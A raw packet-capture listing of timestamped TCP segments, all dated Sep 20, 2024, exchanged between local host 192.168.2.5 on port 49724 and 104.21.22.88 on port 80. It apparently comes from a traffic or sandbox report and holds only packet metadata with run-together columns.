                                                              Sep 20, 2024 12:00:05.904148102 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904156923 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.904162884 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904180050 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904191971 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.904196024 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904212952 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904226065 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904237032 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.904242039 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904263020 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.904278994 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.904485941 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904511929 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904526949 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904540062 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904556036 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904571056 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904582977 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.904586077 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904619932 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.904706955 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904721975 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904737949 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904752970 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904752970 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.904767990 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904783010 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904793024 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.904798031 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904814005 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904814005 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.904831886 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904844046 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.904859066 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904874086 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904881001 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.904890060 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904906034 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904922009 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904922009 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.904941082 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.904947042 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.905059099 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.905133963 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.905158043 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.905173063 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.905189991 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.905204058 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.905219078 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.905220985 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.905236006 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.905241013 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.905251980 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.905261993 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.905268908 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.905297995 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.945164919 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.993418932 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993439913 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993494034 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993509054 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993524075 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993539095 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993554115 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993568897 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993582964 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993598938 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993613958 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993628025 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993640900 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993655920 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993664026 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.993670940 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993685961 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993710041 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993721008 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.993740082 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993742943 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.993757010 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993772984 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993793964 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.993798971 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993813992 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993814945 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.993830919 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993844986 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993859053 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993872881 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.993874073 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993906975 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993913889 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.993921995 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993935108 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.993940115 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993954897 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993968964 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993983984 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.993983984 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994004011 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994012117 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994028091 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994043112 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994044065 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994057894 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994075060 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994082928 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994090080 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994102001 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994117975 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994133949 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994146109 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994184017 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994191885 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994199991 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994215965 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994240046 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994247913 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994256973 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994271994 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994287014 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994298935 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994311094 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994323969 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994329929 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994345903 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994360924 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994374990 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994375944 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994391918 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994405031 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994421959 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994431973 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994438887 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994462967 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994467020 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994479895 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994494915 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994510889 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994510889 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994524956 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994540930 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994546890 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994555950 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994570017 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994573116 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994590998 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994602919 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994616032 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994630098 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994641066 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994649887 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994676113 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994680882 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994699001 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994713068 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994718075 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994718075 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994730949 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994745970 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994760036 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994761944 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994785070 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994786978 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994808912 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994823933 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994834900 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994842052 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994858027 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994872093 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994891882 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994905949 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994915009 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994930029 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994932890 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994949102 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.994977951 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.994987965 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995003939 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995018959 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995035887 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995038033 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.995049953 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995063066 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.995066881 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995084047 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995098114 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995101929 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.995122910 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.995124102 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995148897 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995162964 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995171070 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.995178938 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995204926 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.995206118 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995222092 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995237112 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995248079 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.995254040 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995271921 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995280981 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.995287895 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995318890 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995328903 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.995336056 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995352983 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995366096 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.995367050 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995397091 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995403051 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.995414019 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995443106 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.995444059 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995461941 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995477915 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995491982 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995496988 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.995508909 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995518923 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.995526075 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995542049 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995558023 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:05.995558977 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:05.995593071 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.038878918 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.084273100 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084299088 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084317923 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084345102 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084358931 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084373951 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084391117 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084414005 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084431887 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084455013 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084470034 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084485054 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084500074 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084513903 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084530115 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084544897 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084559917 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084573984 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084589005 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084603071 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084618092 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084631920 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084645987 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084661007 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084676027 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084690094 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084705114 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084717989 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084743977 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.084781885 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084796906 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084827900 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084840059 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084850073 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.084861040 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084877968 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.084887028 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084892988 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.084903955 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084927082 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084930897 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.084943056 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084974051 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.084975004 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.084991932 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085005999 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085020065 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085021019 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085037947 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085050106 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085053921 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085071087 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085077047 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085087061 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085102081 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085128069 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085133076 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085150003 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085155010 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085165024 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085189104 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085201979 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085206032 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085221052 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085225105 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085237980 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085253000 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085258007 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085269928 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085287094 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085299969 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085303068 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085318089 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085331917 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085335016 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085349083 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085366011 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085369110 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085397959 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085400105 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085427046 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085436106 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085450888 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085467100 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085479021 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085489988 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085491896 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085510015 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085525036 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085526943 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085541010 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085556030 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085562944 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085591078 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085604906 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085608959 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085625887 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085642099 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085649967 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085666895 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085681915 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085697889 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085705996 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085715055 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085731030 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:06.085732937 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:06.085755110 CEST8049724104.21.22.88192.168.2.5
